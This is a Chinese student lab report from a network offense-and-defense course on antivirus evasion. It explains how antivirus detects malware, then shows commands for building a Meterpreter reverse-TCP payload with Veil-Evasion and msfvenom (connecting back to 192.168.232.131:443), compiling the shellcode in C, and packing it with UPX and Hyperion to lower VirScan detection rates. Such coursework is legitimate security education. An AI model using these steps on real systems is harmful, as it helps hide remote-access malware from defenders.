20155207 《網絡對抗技術》EXP3 免殺原理與實踐

20155207 《網絡對抗技術》EXP3 免殺原理與實踐

基礎問題回答

殺軟是如何檢測出惡意代碼的？

- 根據特徵碼進行檢測（靜態）
- 啓發式（模糊特徵點、行爲 ）
- 根據行爲進行檢測

免殺是作什麼？

免殺就是反病毒（AntiVirus）與反間諜（AntiSpyware）的對立面，英文爲Anti-AntiVirus（簡寫Virus AV），讓惡意代碼不被殺毒軟件查殺

免殺的基本方法有哪些？

- 改變特徵碼（加殼、編碼）
- 改變行爲（通信方式、操做模式）
- 利用現有後門軟件
- 使用漏洞應用做爲後門
- 社工類攻擊，誘導關閉殺軟
- 手工打造惡意軟件

實驗總結與體會

• 本次實驗在上次實驗的基礎上實現了免殺，嘗試了msf編碼、Veil-Evasion等方式製做免殺程序，最後成功實現了免殺，技術很簡單可是安裝veil實在是太讓人心累了...

離實戰還缺些什麼技術或步驟

• 雖然可以免殺，可是並無植入其餘電腦的方式，好比沒有本身複製的功能或者利用系統或協議漏洞進行攻擊的步驟

實驗內容

1.正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧。

2.經過組合應用各類技術實現惡意代碼免殺（若是成功實現了免殺的，簡單語言描述原理，不要截圖。與殺軟共生的結果驗證要截圖）。

3.用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本。

實驗步驟

Veil-Evasion安裝

• 輸入命令sudo apt-get install veil安裝veil，後面一路next

• 輸入命令sudo apt-get install veil-evasion安裝Veil-Evasion，一路next

Veil-Evasion免殺使用：

• 輸入veil進入至veil中，而後輸入use evasion進入到use evasion中

• 輸入use c/meterpreter/rev_tcp.py生成可執行文件；
  設置反彈IP和端口號：
  set LHOST linuxIP
set LPORT 端口號
generate

輸入文件名保存以後進行查殺檢測

C語言調用Shellcode

• 半手工打造一個惡意軟件

• 生成一個c語言格式的Shellcode數組，替換代碼中的對應部分，並拷貝到VS中編譯運行

• 上傳到VirScan，39個殺軟中有4個顯示它是病毒，比前面的實驗查殺率又下降了不少

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.131 LPORT=443 -f c生成shellcode數組

輸入gedit編寫c語言惡意代碼

mingw-w64 將c語言文件生成exe文件

查殺測試結果

加殼

• 輸入命令upx 加殼前文件名.exe -o 加殼後文件名.exe進行加殼

• 輸入命令wine hyperion.exe -v 加密前,exe 加密後.exe進行加密殼操做